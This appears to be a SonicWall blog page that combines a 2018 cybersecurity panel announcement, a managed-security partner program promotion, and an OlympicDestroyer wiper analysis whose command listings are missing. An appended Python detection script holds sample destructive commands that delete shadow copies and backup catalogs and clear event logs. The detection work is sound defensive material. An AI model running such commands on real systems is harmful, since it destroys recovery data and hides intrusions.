Cybercrime is a lucrative and booming industry, with recent reports estimating $600 billion in damages to businesses. With the introduction of innovative cyber security technologies and new cyber attack variants, the race is on for private and public organizations to arm themselves for a battle that is being waged in a dynamic threat landscape.


On March 6, cyber security experts and policymakers will come together in a panel discussion to address the current threat landscape and its impact on the U.S. economy. Featuring Congressman Lamar Smith, SonicWall CEO Bill Conner and the Honorable Secretary Michael Chertoff, the panel will foster dialogues that focus on the preventative measures organizations should take to thwart cyber attacks, as well as the joint efforts of government and law enforcement agencies combatting modern-day cyber attacks, cybercriminals and threat actors.

Preceding the event, Conner and Chertoff penned an opinion piece, “SEC, Congress take steps toward cyber accountability and transparency,” on The Hill.


“Cyber risk affects virtually every kind of enterprise. It is not a matter of if, but when,” they wrote on The Hill. “Companies should start with the presumption that they will be attacked and have a comprehensive incident response plan in place. An incident response plan should include a consumer notification process especially when sensitive data such as Social Security numbers and financial information is corrupted.”

Event: Cybersecurity Panel Discussion – 2018 SonicWall Cyber Threat Report
Date: Tuesday, March 6, 12:30 p.m. EST
Location: Committee Room 2325, Rayburn House Office Building, Washington D.C.
Panel:

  • Chairman Lamar Smith, Congressman, 21st Congressional District of Texas
  • Honorable Secretary Michael Chertoff, former head of the U.S. Department of Homeland Security
  • Bill Conner, President and CEO, SonicWall
  • Michael Crean, CEO, Solutions Granted

The panel also will leverage and discuss the findings and intelligence from the 2018 SonicWall Cyber Threat Report, which provides key advances for the security industry and cybercriminals; exclusive data on the 2017 threat landscape; cyber security predictions for 2018; cyber security guidelines and best practices.


SonicWall MSSP Program: Blueprint for Filling the Cyber Security Skills Gap

The demand for experienced cyber security professionals is at an all-time high. These highly skilled assets are essential in helping businesses protect customers, networks, sensitive data and intellectual property in a fast-moving cyber arms race.

But according to a recent ESG study, 51 percent of respondents claimed their organization had a problematic shortage of cyber security skills, a figure that has more than doubled since 2014 (as reported by CSO Online). I have watched this deficiency consistently grow over the last five years.

Organizations are struggling to understand their own risk, which threats to focus on and where to put more of their security, resources and people to protect their environment.

When deploying new software, systems and architecture to run their business, companies find themselves redefining their cyber security strategy. They become focused on combating the cyber criminals and threat actors attacking their vulnerable web applications, systems, networks and connected devices. And they lose focus on their core business.


They must procure, implement, manage and optimize numerous cyber security tools and solutions that are running on different platforms and providing data in various formats. Security manageability and accountability becomes an operational challenge.

The absence of coordination, central collection, normalization and analysis of disparate data often leads to an incomplete and incoherent view of what is happening in the organization. This lack of visibility and awareness inside the security environment further impairs an organization’s ability to identify and remediate security gaps.

The absence of an in-house security team often compels organizations to outsource their entire security program to a capable managed security service provider (MSSP). It is all about managing and reducing risks, and responding fast to security events. For a majority of companies, this is a smart approach.

Managed security services (MSS) come in many different flavors and degrees of complexity. In fact, according to Research and Markets, the global MSSP market is predicted to exceed $31 billion by 2019 and the escalating cyber arms race is a primary catalyst.

Thankfully, I already see that many SonicWall SecureFirst partners have implemented managed security solutions to fill the skills gap. Others are in the process of doing so.

SonicWall continues to be committed to enabling partners to grow their services practices, and it’s the core reason we’ve just rolled out the SecureFirst MSSP Partner Program.

The SonicWall SecureFirst MSSP Partner Program

We designed our MSSP Program with the flexibility to ensure SecureFirst Partners across the spectrum of MSSP maturity models could participate and gain significant value from participation in the program.

Available to SecureFirst Silver, Gold and Platinum Partners, the SecureFirst MSSP Partner Program includes options for monthly billing through SonicWall’s popular Security-as-a-Service pricing model, multi-tenant capabilities and go-to-market branding opportunities. The SecureFirst MSSP Program will help eligible partners:

  • Design, launch and scale their MSSP offerings
  • Defend customers against evolving threats
  • Grow deeper customer relationships that place partners in a position of trust and thought leadership
  • Increase profitability by offering recurring, consistent revenue streams
  • Help customers reduce or eliminate upfront product costs

A constant struggle for MSSPs today is managing their operating costs, which makes security solution selection critical in helping minimize man-hours responding to incidents. With SonicWall Capture Labs threat intelligence data, SonicWall empowers MSSP partners with the critical threat visibility to offer customers real value through automated, ongoing and proactive protection in today’s ever-evolving threat landscape.

The MSSP ‘blueprint’

Recognizing that time to revenue is critical, our MSSP program offers MSS blueprints to help Partners jumpstart their managed security service offerings quickly and cost effectively. These blueprints provide the training, tools and support required to deliver a range of managed service offerings based on SonicWall solutions they already trust.

The program helps SonicWall partners offer a range of managed security service offerings, either by implementing SonicWall MSS blueprints for high-demand managed security solutions or by jointly developing custom MSS offerings that build on their existing managed service core competencies and expertise.

Jumpstarting MSSP offerings

I strongly believe that proactive MSSPs are agile, responsive and skilled. They have the mindset to deliver valuable security outcomes, which are more realistic and cost-effective than customers taking their cyber security efforts in-house.

Following the Partner Enabled Services program SonicWall launched in 2017, the SonicWall MSSP Partner program is focused on helping partners — of all MSS maturity stages — jumpstart their managed services offerings to quickly fill their customers’ cyber security skills gap.

One of our trusted partners told me, “More of our customers are looking toward end-to-end managed security services to protect themselves.”

It’s just one of the many candid pieces of feedback I receive when talking to our partners across the board. As a 100 percent channel company, I knew the SonicWall MSSP Partner program was the next step to support our loyal channel community.

Ready to Enroll in the SonicWall MSSP Program?

Eligible SecureFirst Partners may register for the SonicWall SecureFirst MSSP Program online at https://www.sonicwall.com/en-us/partners/mssp-partner-program. For additional information, please download our complimentary program brochure.

Olympic Destroyer malware targeted Pyeongchang Games

The SonicWall Capture Labs Threat Research Team observed new malware called OlympicDestroyer [OlympicDestroyer.A]. The Winter Olympics this year is being held in Pyeongchang, South Korea, and OlympicDestroyer malware was designed to knock computers offline by deleting critical system files, which would render the machines useless. This malware was used in an attack on the opening ceremony of the Pyeongchang Winter Games.

Infection Cycle:

The malware adds the following files to the system:

  • Malware.exe
    • %Userprofile%\windows\AppData\Local\Temp\_ail.exe
    • %Userprofile%\windows\AppData\Local\Temp\_cqk.exe
    • %Userprofile%\windows\AppData\Local\Temp\_lew.exe
    • %Userprofile%\windows\AppData\Local\Temp\mbxve.exe
    • %Userprofile%\Public\19D132B60A21D68CFAC81B1BD252C965

Once the computer is compromised, the malware runs the following commands:

The malware overwrites the computer’s partition table to prevent targets from recovering their system drive, thereby making the infected machine unusable:

The malware deletes all shadow copies on the system using the vssadmin tool:

The malware deletes all Web admin backup files on the target system:

The malware wipes all available logs of the System and Security Windows event logs to ensure that recovery is extremely difficult:

The malware drops two VBS files on the target system and executes them via the VBScript tool:

The credentials embedded in the malware sample indicate that the Olympics’ IT providers were likely compromised by the same hackers that ultimately hit the Winter Olympics. It remains unclear how the hackers were able to steal so much information from Olympics employees. Here are some examples of embedded credentials:

After the malware runs the above commands, it deletes itself using shellcode injected into a legitimate copy of notepad.exe: the malware writes the shellcode into allocated memory through WriteProcessMemory and creates a remote thread for its execution via the CreateRemoteThread function. The injected notepad.exe waits until the sample terminates, and then deletes it.

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: OlympicDestroyer.A (Trojan)
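Detection logic for the behaviours described in the infection cycle above (shadow-copy deletion with vssadmin, backup deletion, event-log clearing, and the remote thread created in a legitimate notepad.exe), as an added example that is not SonicWall's own code or signature. It assumes Sysmon-style process-creation (Event ID 1) and CreateRemoteThread (Event ID 8) records; the field names and every sample event are constructed for illustration, and mapping the page's "Web admin backup files" to the wbadmin backup catalog is an assumption.

```python
"""Flag OlympicDestroyer-like recovery inhibition and thread injection in
Sysmon-style event records. Added example; the events below are constructed."""
import re
from collections import defaultdict
from typing import Dict, List

# Constructed Sysmon-like records (field names are an assumption):
# EventID 1 = process creation, EventID 8 = CreateRemoteThread.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"EventID": "1", "Computer": "WS01",
     "CommandLine": "vssadmin.exe list shadows"},                 # benign admin use
    {"EventID": "1", "Computer": "WS01",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},   # shadow copies removed
    {"EventID": "1", "Computer": "WS01",
     "CommandLine": "wbadmin.exe delete catalog -quiet"},         # backup catalog removed
    {"EventID": "1", "Computer": "WS01",
     "CommandLine": "wevtutil.exe cl System"},                    # System log cleared
    {"EventID": "1", "Computer": "WS01",
     "CommandLine": "wevtutil.exe cl Security"},                  # Security log cleared
    {"EventID": "8", "Computer": "WS01",
     "SourceImage": r"C:\Users\victim\AppData\Local\Temp\_ail.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe"},          # thread into notepad
    {"EventID": "8", "Computer": "WS02",
     "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Program Files\Example\app.exe"},         # unrelated, not flagged
]

# Each rule is matched against the lower-cased command line of an Event ID 1.
# Only the destructive sub-commands match; "vssadmin list shadows" does not.
PROCESS_RULES = [
    ("shadow_copy_deletion",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\s+shadows\b")),
    ("backup_catalog_deletion",
     re.compile(r"\bwbadmin(?:\.exe)?\b.*\bdelete\s+catalog\b")),
    ("event_log_cleared",
     re.compile(r"\bwevtutil(?:\.exe)?\b.*\b(?:cl|clear-log)\s+(?:system|security)\b")),
]


def classify_process_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules whose pattern matches the command line."""
    cmd = event.get("CommandLine", "").lower()
    return [name for name, rx in PROCESS_RULES if rx.search(cmd)]


def is_suspicious_remote_thread(event: Dict[str, str]) -> bool:
    """A remote thread created in notepad.exe by an image running from a
    user-writable Temp directory matches the self-deletion step described."""
    source = event.get("SourceImage", "").lower()
    target = event.get("TargetImage", "").lower()
    return target.endswith("\\notepad.exe") and "\\appdata\\local\\temp\\" in source


def analyze(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group distinct findings per host: {host: sorted finding names}."""
    findings = defaultdict(set)
    for ev in events:
        host = ev.get("Computer", "?")
        if ev.get("EventID") == "1":
            for name in classify_process_event(ev):
                findings[host].add(name)
        elif ev.get("EventID") == "8" and is_suspicious_remote_thread(ev):
            findings[host].add("remote_thread_into_notepad")
    return {host: sorted(names) for host, names in findings.items()}


def wiper_like_hosts(events: List[Dict[str, str]], min_recovery_rules: int = 2) -> List[str]:
    """Hosts where at least `min_recovery_rules` distinct recovery-inhibiting
    actions were seen; a single vssadmin call alone is too noisy to page on."""
    hosts = []
    for host, names in analyze(events).items():
        recovery = [n for n in names if n != "remote_thread_into_notepad"]
        if len(recovery) >= min_recovery_rules:
            hosts.append(host)
    return sorted(hosts)


if __name__ == "__main__":
    for host, names in analyze(SAMPLE_EVENTS).items():
        print(host, names)
    print("wiper-like hosts:", wiper_like_hosts(SAMPLE_EVENTS))
```

The correlation step matters more than any single rule: administrators do run vssadmin and wbadmin, but a host that removes shadow copies, deletes the backup catalog and clears the System and Security logs within one session is exhibiting the recovery-inhibition chain this post describes, and the CreateRemoteThread record into notepad.exe from a Temp-resident image adds the self-deletion step for confirmation.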